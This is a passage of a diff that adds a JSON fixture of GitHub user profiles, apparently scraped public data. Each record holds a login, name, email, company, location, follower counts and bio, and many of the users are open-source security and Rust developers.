+ "bio": "Software security engineer building the next generation of industrial control systems in Rust.\r\n", + "is_hireable": false, + "twitter_username": "jadamcrain" + } +}, +{ + "model": "github.user", + "pk": 1494, + "fields": { + "nest_created_at": "2024-09-11T23:37:17.624Z", + "nest_updated_at": "2024-09-22T18:48:48.207Z", + "name": "Jens Reimann", + "login": "ctron", + "email": "ctron@dentrassi.de", + "avatar_url": "https://avatars.githubusercontent.com/u/202474?v=4", + "company": "@RedHatOfficial", + "location": "München", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 261, + "public_gists_count": 9, + "public_repositories_count": 464, + "created_at": "2010-02-12T13:53:25Z", + "updated_at": "2024-08-26T06:24:39Z", + "node_id": "MDQ6VXNlcjIwMjQ3NA==", + "bio": "Loving Open Source, contributing to @eclipse, working for @RedHatOfficial. This is my personal profile.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1495, + "fields": { + "nest_created_at": "2024-09-11T23:37:18.970Z", + "nest_updated_at": "2024-09-11T23:37:19.794Z", + "name": "Andrew Lilley Brinker", + "login": "alilleybrinker", + "email": "abrinker@mitre.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1223605?v=4", + "company": "@mitre", + "location": "Orange County, California", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 128, + "public_gists_count": 12, + "public_repositories_count": 40, + "created_at": "2011-11-27T18:08:21Z", + "updated_at": "2024-08-14T20:04:38Z", + "node_id": "MDQ6VXNlcjEyMjM2MDU=", + "bio": "👷🏻‍♂️ Hipcheck, OmniBOR\r\n🖊️ Open source software, security, memory safety\r\n☕ Coffee, more coffee", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1496, + "fields": { + "nest_created_at": "2024-09-11T23:37:20.667Z", + "nest_updated_at": "2024-09-22T18:48:47.268Z", + "name": "Lars Francke", + "login": "lfrancke", + "email": "github@lars-francke.de", + "avatar_url": "https://avatars.githubusercontent.com/u/122850?v=4", + "company": "@stackabletech ", + "location": "Hamburg, Germany", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 41, + "public_gists_count": 4, + "public_repositories_count": 84, + "created_at": "2009-09-03T13:55:18Z", + "updated_at": "2024-09-05T08:33:15Z", + "node_id": "MDQ6VXNlcjEyMjg1MA==", + "bio": "Co-Founder of @stackabletech and @opencore.\r\n\r\nBuilding a modern data platform at Stackable: Open Source based on Kubernetes", + "is_hireable": false, + "twitter_username": "lars_francke" + } +}, +{ + "model": "github.user", + "pk": 1497, + "fields": { + "nest_created_at": "2024-09-11T23:37:21.538Z", + "nest_updated_at": "2024-09-22T18:48:45.691Z", + "name": "Sergey \"Shnatsel\" Davidoff", + "login": "Shnatsel", + "email": "shnatsel@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/291257?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 307, + "public_gists_count": 7, + "public_repositories_count": 158, + "created_at": "2010-05-30T09:12:08Z", + "updated_at": "2024-09-14T10:29:24Z", + "node_id": "MDQ6VXNlcjI5MTI1Nw==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1498, + "fields": { + "nest_created_at": "2024-09-11T23:37:27.035Z", + "nest_updated_at": "2024-09-11T23:37:27.035Z", + "name": "Scott Kempf", + "login": "ModestMannfred", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/158148407?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-01-30T09:07:27Z", + "updated_at": "2024-06-19T08:59:42Z", + "node_id": "U_kgDOCW0nNw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1499, + "fields": { + "nest_created_at": "2024-09-11T23:37:29.541Z", + "nest_updated_at": "2024-09-22T18:48:46.323Z", + "name": "Christian Poveda Ruiz", + "login": "pvdrz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31802960?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 60, + "public_gists_count": 16, + "public_repositories_count": 25, + "created_at": "2017-09-09T16:29:00Z", + "updated_at": "2024-09-20T11:50:09Z", + "node_id": "MDQ6VXNlcjMxODAyOTYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1500, + "fields": { + "nest_created_at": "2024-09-11T23:37:33.639Z", + "nest_updated_at": "2024-09-22T18:48:45.996Z", + "name": "Sebastian Ziebell", + "login": "justahero", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1305185?v=4", + "company": "", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 61, + "followers_count": 48, + "public_gists_count": 18, + "public_repositories_count": 55, + "created_at": "2012-01-04T22:37:09Z", + "updated_at": "2024-08-13T13:36:35Z", + "node_id": "MDQ6VXNlcjEzMDUxODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1501, + "fields": { + "nest_created_at": "2024-09-11T23:37:54.374Z", + "nest_updated_at": "2024-09-11T23:37:54.374Z", + "name": "Patrik Svensson", + "login": "patriksvensson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/357872?v=4", + "company": "@spectresystems", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 87, + "followers_count": 811, + "public_gists_count": 35, + "public_repositories_count": 57, + "created_at": "2010-08-08T18:56:06Z", + "updated_at": "2024-09-11T09:03:10Z", + "node_id": "MDQ6VXNlcjM1Nzg3Mg==", + "bio": "Father. Husband. Programmer. Creator of Cake (@cake-build) and Spectre.Console (@spectreconsole). Microsoft MVP. GitHub Star alumni. I like OSS, C#, & Rust", + "is_hireable": true, + "twitter_username": "firstdrafthell" + } +}, +{ + "model": "github.user", + "pk": 1502, + "fields": { + "nest_created_at": "2024-09-11T23:37:56.431Z", + "nest_updated_at": "2024-09-11T23:37:56.431Z", + "name": "MAYANK YADAV", + "login": "yadavmayank742", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41020797?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2018-07-09T17:18:43Z", + "updated_at": "2024-06-28T04:26:15Z", + "node_id": "MDQ6VXNlcjQxMDIwNzk3", + "bio": "An enthusiastic student: currently pursuing my MS in Cybersecurity from Amrita University Kerala.\r\nKeenly interested in Software Development and Cyber Security.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1503, + "fields": { + "nest_created_at": "2024-09-11T23:37:57.249Z", + "nest_updated_at": "2024-09-11T23:37:57.249Z", + "name": "Ognyan Dimitrov", + "login": "ognyandim", + "email": "ognyandim@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2851260?v=4", + "company": "KPMG ITS OOD", + "location": "Sofia, Bulgaria", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 4, + "public_repositories_count": 5, + "created_at": "2012-11-21T06:50:32Z", + "updated_at": "2024-08-17T13:29:17Z", + "node_id": "MDQ6VXNlcjI4NTEyNjA=", + "bio": "A disciple of Jesus, husband, father of three, software developer and physicist.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1504, + "fields": { + "nest_created_at": "2024-09-11T23:37:58.105Z", + "nest_updated_at": "2024-09-22T18:48:04.839Z", + "name": "Klaus Ziegler", + "login": "SpessartZiegler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52484247?v=4", + "company": "Bosch Rexroth AG", + "location": "Lohr", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-07-03T06:49:17Z", + "updated_at": "2024-09-04T15:08:43Z", + "node_id": "MDQ6VXNlcjUyNDg0MjQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1505, + "fields": { + "nest_created_at": "2024-09-11T23:37:59.779Z", + "nest_updated_at": "2024-09-22T18:48:58.495Z", + "name": "Agustin Isasmendi", + "login": "isasmendiagus", + "email": "isasmendi.agus@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17660235?v=4", + "company": "", + "location": "Spain, Madrid", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-03-05T01:06:48Z", + "updated_at": "2024-09-04T17:44:32Z", + "node_id": "MDQ6VXNlcjE3NjYwMjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1506, + "fields": { + "nest_created_at": "2024-09-11T23:38:28.664Z", + "nest_updated_at": "2024-09-11T23:38:28.664Z", + "name": "Tom Schindl", + "login": "tomsontom", + "email": "tom.schindl@bestsolution.at", + "avatar_url": "https://avatars.githubusercontent.com/u/52631?v=4", + "company": "BestSolution.at", + "location": "Innsbruck", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 99, + "public_gists_count": 12, + "public_repositories_count": 66, + "created_at": "2009-02-07T19:20:04Z", + "updated_at": "2024-09-06T16:56:23Z", + "node_id": "MDQ6VXNlcjUyNjMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1507, + "fields": { + "nest_created_at": "2024-09-11T23:38:29.902Z", + "nest_updated_at": "2024-09-11T23:38:29.902Z", + "name": "PrettyCoffee", + "login": "PrettyCoffee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66521452?v=4", + "company": "", + "location": "germany", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 56, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2020-06-06T13:36:15Z", + "updated_at": "2024-09-03T19:03:33Z", + "node_id": "MDQ6VXNlcjY2NTIxNDUy", + "bio": "React webdev. ⚛ CSS is fun. 🌈", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1508, + "fields": { + "nest_created_at": "2024-09-11T23:39:16.871Z", + "nest_updated_at": "2024-09-11T23:39:16.871Z", + "name": "", + "login": "Cor-J", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52933655?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-07-15T18:52:26Z", + "updated_at": "2024-08-12T11:56:44Z", + "node_id": "MDQ6VXNlcjUyOTMzNjU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1509, + "fields": { + "nest_created_at": "2024-09-11T23:39:20.221Z", + "nest_updated_at": "2024-09-11T23:39:20.221Z", + "name": "Nils Hanke", + "login": "Nirusu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26608194?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 57, + "created_at": "2017-03-22T19:04:04Z", + "updated_at": "2024-09-02T10:28:25Z", + "node_id": "MDQ6VXNlcjI2NjA4MTk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1510, + "fields": { + "nest_created_at": "2024-09-11T23:39:36.675Z", + "nest_updated_at": "2024-09-11T23:39:36.675Z", + "name": "Zafer Balkan", + "login": "zbalkan", + "email": "zafer@zaferbalkan.com", + "avatar_url": "https://avatars.githubusercontent.com/u/39981909?v=4", + "company": "", + "location": "Tallinn, Estonia", + "collaborators_count": 0, + "following_count": 343, + "followers_count": 32, + "public_gists_count": 27, + "public_repositories_count": 110, + "created_at": "2018-06-06T06:14:51Z", + "updated_at": "2024-09-05T07:43:36Z", + "node_id": "MDQ6VXNlcjM5OTgxOTA5", + "bio": "IT Pro, Cybersecurity guy", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1511, + "fields": { + "nest_created_at": "2024-09-11T23:39:37.489Z", + "nest_updated_at": "2024-09-22T18:52:09.346Z", + "name": "Tom van den Berg", + "login": "tom171296", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12030148?v=4", + "company": "Info Support", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2015-04-20T08:34:13Z", + "updated_at": "2024-06-16T12:48:29Z", + "node_id": "MDQ6VXNlcjEyMDMwMTQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1512, + "fields": { + "nest_created_at": "2024-09-11T23:39:43.254Z", + "nest_updated_at": "2024-09-22T18:52:14.335Z", + "name": "Qasim Sajid", + "login": "qasim-sajid-snkeos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/149792497?v=4", + "company": "", + "location": "Munich", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-03T12:07:20Z", + "updated_at": "2024-07-02T09:14:37Z", + "node_id": "U_kgDOCO2m8Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1513, + "fields": { + "nest_created_at": "2024-09-11T23:40:12.742Z", + "nest_updated_at": "2024-09-11T23:40:12.742Z", + "name": "Florian Angermeir", + "login": "angrymeir", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16398152?v=4", + "company": "fortiss", + "location": "", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2015-12-22T08:05:33Z", + "updated_at": "2024-08-20T11:36:54Z", + "node_id": "MDQ6VXNlcjE2Mzk4MTUy", + "bio": "Researcher at fortiss & PhD student at BTH", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1514, + "fields": { + "nest_created_at": "2024-09-11T23:40:13.553Z", + "nest_updated_at": "2024-09-11T23:40:13.553Z", + "name": "Phil LaFrance", + "login": "coveros-phil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/114023548?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-09-20T19:15:24Z", + "updated_at": "2024-09-10T22:21:49Z", + "node_id": "U_kgDOBsvcfA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1515, + "fields": { + "nest_created_at": "2024-09-11T23:40:27.709Z", + "nest_updated_at": "2024-09-12T00:08:11.349Z", + "name": "Salve J. Nilsen", + "login": "sjn", + "email": "sjn@cpan.org", + "avatar_url": "https://avatars.githubusercontent.com/u/54637?v=4", + "company": "", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 35, + "public_gists_count": 7, + "public_repositories_count": 112, + "created_at": "2009-02-15T01:50:34Z", + "updated_at": "2024-08-21T16:39:18Z", + "node_id": "MDQ6VXNlcjU0NjM3", + "bio": "Some guy in Oslo, Norway.", + "is_hireable": false, + "twitter_username": "sjoshuan" + } +}, +{ + "model": "github.user", + "pk": 1516, + "fields": { + "nest_created_at": "2024-09-11T23:40:31.908Z", + "nest_updated_at": "2024-09-22T18:52:39.809Z", + "name": "ashley williams", + "login": "ashleygwilliams", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1163554?v=4", + "company": "@axodotdev", + "location": "ATX", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4963, + "public_gists_count": 176, + "public_repositories_count": 373, + "created_at": "2011-10-31T21:36:05Z", + "updated_at": "2024-09-16T22:03:37Z", + "node_id": "MDQ6VXNlcjExNjM1NTQ=", + "bio": "a mess like this is easily five to ten years ahead of its time. former @rustlang core.", + "is_hireable": false, + "twitter_username": "ag_dubs" + } +}, +{ + "model": "github.user", + "pk": 1517, + "fields": { + "nest_created_at": "2024-09-11T23:40:45.943Z", + "nest_updated_at": "2024-09-11T23:40:45.943Z", + "name": "Justin", + "login": "TheMagicNacho", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6934389?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 11, + "public_gists_count": 7, + "public_repositories_count": 88, + "created_at": "2014-03-12T21:04:16Z", + "updated_at": "2024-08-25T18:06:24Z", + "node_id": "MDQ6VXNlcjY5MzQzODk=", + "bio": "Nacho average developer; looking for the queso to my microchip.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1518, + "fields": { + "nest_created_at": "2024-09-11T23:40:46.758Z", + "nest_updated_at": "2024-09-22T18:53:22.739Z", + "name": "Mark Sturdevant", + "login": "markstur", + "email": "mark.sturdevant@ibm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7129103?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 60, + "public_gists_count": 1, + "public_repositories_count": 136, + "created_at": "2014-04-01T16:04:43Z", + "updated_at": "2024-06-20T10:20:07Z", + "node_id": "MDQ6VXNlcjcxMjkxMDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1519, + "fields": { + "nest_created_at": "2024-09-11T23:40:48.968Z", + "nest_updated_at": "2024-09-22T18:52:53.258Z", + "name": "Priti Desai", + "login": "pritidesai", + "email": "pdesai@us.ibm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/206285?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 32, + "public_gists_count": 145, + "public_repositories_count": 102, + "created_at": "2010-02-18T20:57:39Z", + "updated_at": "2024-08-29T19:49:57Z", + "node_id": "MDQ6VXNlcjIwNjI4NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1520, + "fields": { + "nest_created_at": "2024-09-11T23:41:38.629Z", + "nest_updated_at": "2024-09-11T23:41:38.629Z", + "name": "Simone Lazzaris", + "login": "SimoneLazzaris", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11316967?v=4", + "company": "vChain Inc", + "location": "Bergamo, Italy", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 48, + "created_at": "2015-03-04T16:20:21Z", + "updated_at": "2024-09-05T18:55:11Z", + "node_id": "MDQ6VXNlcjExMzE2OTY3", + "bio": "", + "is_hireable": false, + "twitter_username": "SimoneLazzaris" + } +}, +{ + "model": "github.user", + "pk": 1521, + "fields": { + "nest_created_at": "2024-09-11T23:41:41.057Z", + "nest_updated_at": "2024-09-11T23:41:41.057Z", + "name": "", + "login": "celek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5641827?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2013-10-08T20:53:33Z", + "updated_at": "2024-09-11T13:19:50Z", + "node_id": "MDQ6VXNlcjU2NDE4Mjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1522, + "fields": { + "nest_created_at": "2024-09-11T23:41:49.260Z", + "nest_updated_at": "2024-09-11T23:41:49.260Z", + "name": "Sean Nguyen", + "login": "snooyen", + "email": "sean@bright.ai", + "avatar_url": "https://avatars.githubusercontent.com/u/5706159?v=4", + "company": "@BrightDotAi", + "location": "Santa Barbara, California", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2013-10-17T03:58:25Z", + "updated_at": "2024-05-02T15:29:28Z", + "node_id": "MDQ6VXNlcjU3MDYxNTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1523, + "fields": { + "nest_created_at": "2024-09-11T23:41:50.108Z", + "nest_updated_at": "2024-09-11T23:41:50.108Z", + "name": "Jörg Arndt", + "login": "Joerki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2178313?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2012-08-19T11:22:55Z", + "updated_at": "2024-07-22T07:48:57Z", + "node_id": "MDQ6VXNlcjIxNzgzMTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1524, + "fields": { + "nest_created_at": "2024-09-11T23:41:50.909Z", + "nest_updated_at": "2024-09-12T01:37:07.481Z", + "name": "", + "login": "macariem", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/150916824?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-15T11:45:11Z", + "updated_at": "2024-09-10T07:39:01Z", + "node_id": "U_kgDOCP7O2A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1525, + "fields": { + "nest_created_at": "2024-09-11T23:42:07.233Z", + "nest_updated_at": "2024-09-11T23:42:07.233Z", + "name": "Gareth Rushgrove", + "login": "garethr", + "email": "gareth@morethanseven.net", + "avatar_url": "https://avatars.githubusercontent.com/u/2029?v=4", + "company": "@snyk ", + "location": "Cambridge", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 871, + "public_gists_count": 80, + "public_repositories_count": 293, + "created_at": "2008-03-03T16:49:25Z", + "updated_at": "2024-01-04T08:15:35Z", + "node_id": "MDQ6VXNlcjIwMjk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1526, + "fields": { + "nest_created_at": "2024-09-11T23:42:09.308Z", + "nest_updated_at": "2024-09-22T18:48:50.132Z", + "name": "Jeffry Hesse", + "login": "DarthHater", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5544326?v=4", + "company": "@sonatype ", + "location": "Talkeetna, Alaska", + "collaborators_count": 0, + "following_count": 50, + "followers_count": 61, + "public_gists_count": 1, + "public_repositories_count": 72, + "created_at": "2013-09-25T20:08:39Z", + "updated_at": "2023-12-27T19:26:13Z", + "node_id": "MDQ6VXNlcjU1NDQzMjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1527, + "fields": { + "nest_created_at": "2024-09-11T23:42:11.407Z", + "nest_updated_at": "2024-09-22T18:48:21.075Z", + "name": "Thomas Graf", + "login": "tngraf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1225388?v=4", + "company": "Siemens", + "location": "Karlsruhe, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2011-11-28T13:39:55Z", + "updated_at": "2024-09-06T11:25:29Z", + "node_id": "MDQ6VXNlcjEyMjUzODg=", + "bio": "Developer, architect, principal open source license compliance expert", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1528, + "fields": { + "nest_created_at": "2024-09-11T23:42:13.993Z", + "nest_updated_at": "2024-09-22T16:34:21.801Z", + "name": "Taras Ivashchenko", + "login": "oxdef", + "email": "oxdef@oxdef.info", + "avatar_url": "https://avatars.githubusercontent.com/u/3337518?v=4", + "company": "@woltapp", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 40, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2013-01-22T09:44:06Z", + "updated_at": "2024-07-06T18:52:32Z", + "node_id": "MDQ6VXNlcjMzMzc1MTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1529, + "fields": { + "nest_created_at": "2024-09-11T23:42:16.458Z", + "nest_updated_at": "2024-09-22T20:24:17.249Z", + "name": "Joubin Jabbari", + "login": "joubin", + "email": "joubin@linux.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1058767?v=4", + "company": "@ucdavis @Silentgen @OWASP @threatspec ", + "location": "San Francisco, CA", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 31, + "public_gists_count": 23, + "public_repositories_count": 107, + "created_at": "2011-09-17T19:43:56Z", + "updated_at": "2024-08-28T11:22:26Z", + "node_id": "MDQ6VXNlcjEwNTg3Njc=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1530, + "fields": { + "nest_created_at": "2024-09-11T23:42:19.408Z", + "nest_updated_at": "2024-09-11T23:42:19.408Z", + "name": "", + "login": "CodingVoid", + "email": "maximilian.brune@9elements.com", + "avatar_url": "https://avatars.githubusercontent.com/u/36151481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2018-02-05T08:19:11Z", + "updated_at": "2024-09-08T18:11:57Z", + "node_id": "MDQ6VXNlcjM2MTUxNDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1531, + "fields": { + "nest_created_at": "2024-09-11T23:42:20.625Z", + "nest_updated_at": "2024-09-11T23:42:20.625Z", + "name": "", + "login": "Radial01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50110449?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-04-29T14:24:56Z", + "updated_at": "2024-08-01T13:39:51Z", + "node_id": "MDQ6VXNlcjUwMTEwNDQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1532, + "fields": { + "nest_created_at": "2024-09-11T23:42:24.352Z", + "nest_updated_at": "2024-09-11T23:42:24.352Z", + "name": "Cookie Engineer", + "login": "cookiengineer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/592637?v=4", + "company": "@tholian-network", + "location": "Heidelberg, Germany", + "collaborators_count": 0, + "following_count": 55, + "followers_count": 491, + "public_gists_count": 10, + "public_repositories_count": 32, + "created_at": "2011-01-31T12:11:46Z", + "updated_at": "2024-08-29T05:08:22Z", + "node_id": "MDQ6VXNlcjU5MjYzNw==", + "bio": "Building a peer-to-peer AI-driven Cyber Defense network to fight off certain cyber-terrorist threat actors.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1533, + "fields": { + "nest_created_at": "2024-09-11T23:42:25.163Z", + "nest_updated_at": "2024-09-22T18:49:15.880Z", + "name": "Nemo", + "login": "captn3m0", + "email": "github.contact@captnemo.in", + "avatar_url": "https://avatars.githubusercontent.com/u/584253?v=4", + "company": "", + "location": "Bangalore, India", + "collaborators_count": 0, + "following_count": 780, + "followers_count": 1817, + "public_gists_count": 81, + "public_repositories_count": 437, + "created_at": "2011-01-26T08:56:27Z", + "updated_at": "2024-09-17T05:55:08Z", + "node_id": "MDQ6VXNlcjU4NDI1Mw==", + "bio": "Making and Breaking things, sometimes intentionally", + "is_hireable": false, + "twitter_username": "captn3m0" + } +}, +{ + "model": "github.user", + "pk": 1534, + "fields": { + "nest_created_at": "2024-09-11T23:42:25.996Z", + "nest_updated_at": "2024-09-11T23:42:25.996Z", + "name": "", + "login": "jheck88", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10718570?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 19, + "created_at": "2015-01-27T02:27:47Z", + "updated_at": "2023-07-17T19:10:20Z", + "node_id": "MDQ6VXNlcjEwNzE4NTcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1535, + "fields": { + "nest_created_at": "2024-09-11T23:42:26.829Z", + "nest_updated_at": "2024-09-22T19:24:02.497Z", + "name": "Jeff Williams", + "login": "planetlevel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2704076?v=4", + "company": "Contrast Security", + "location": "Baltimore, MD", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 42, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2012-11-02T03:23:24Z", + "updated_at": "2024-09-04T11:21:45Z", + "node_id": "MDQ6VXNlcjI3MDQwNzY=", + "bio": "https://www.linkedin.com/in/planetlevel/", + "is_hireable": false, + "twitter_username": "planetlevel" + } +}, +{ + "model": "github.user", + "pk": 1536, + "fields": { + "nest_created_at": "2024-09-11T23:42:34.278Z", + "nest_updated_at": "2024-09-11T23:42:34.278Z", + "name": "John Andersen", + "login": "pdxjohnny", + "email": "john.s.andersen@intel.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5950433?v=4", + "company": "@intel", + "location": "Portland", + "collaborators_count": 0, + "following_count": 120, + "followers_count": 145, + "public_gists_count": 235, + "public_repositories_count": 277, + "created_at": "2013-11-15T18:35:37Z", + "updated_at": "2024-09-05T23:58:49Z", + "node_id": "MDQ6VXNlcjU5NTA0MzM=", + "bio": "🎩 Insania Vocat Ad Te 🐰🕳️\r\nJohn 1:23 Rev 22:17 Luke 8:17 Matt 13:10-16, 6:24\r\nDecentralize the means of production. Opinions expressed via account my are own", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1537, + "fields": { + 